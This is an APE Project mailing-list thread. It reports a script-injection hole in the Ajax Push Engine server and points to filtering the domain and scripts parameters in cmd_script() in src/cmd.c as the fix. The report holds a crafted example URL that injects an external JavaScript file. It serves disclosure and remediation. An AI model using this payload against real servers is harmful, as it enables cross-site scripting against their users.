He did mentioned src/cmd.c On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote:
> Have you released any patch, if you made some workaround what file > should we patch? > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: > > I managed recently with an issue that allows to inject any js script by > > preparing link like: > http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}] > > > > It allows either attach script from your url or inject script directly > such > > as in this example. > > > > The solution for this issue is to filter both params domain and scripts > in > > file src/cmd.c (function: cmd_script()) in ape server. > > -- > You received this message because you are subscribed to the Google > Groups "APE Project" group. > To post to this group, send email to [email protected] > To unsubscribe from this group, send email to > [email protected] > For more options, visit this group at > http://groups.google.com/group/ape-project?hl=en > --- > APE Project (Ajax Push Engine) > Official website : http://www.ape-project.org/ > Git Hub : http://github.com/APE-Project/ > -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
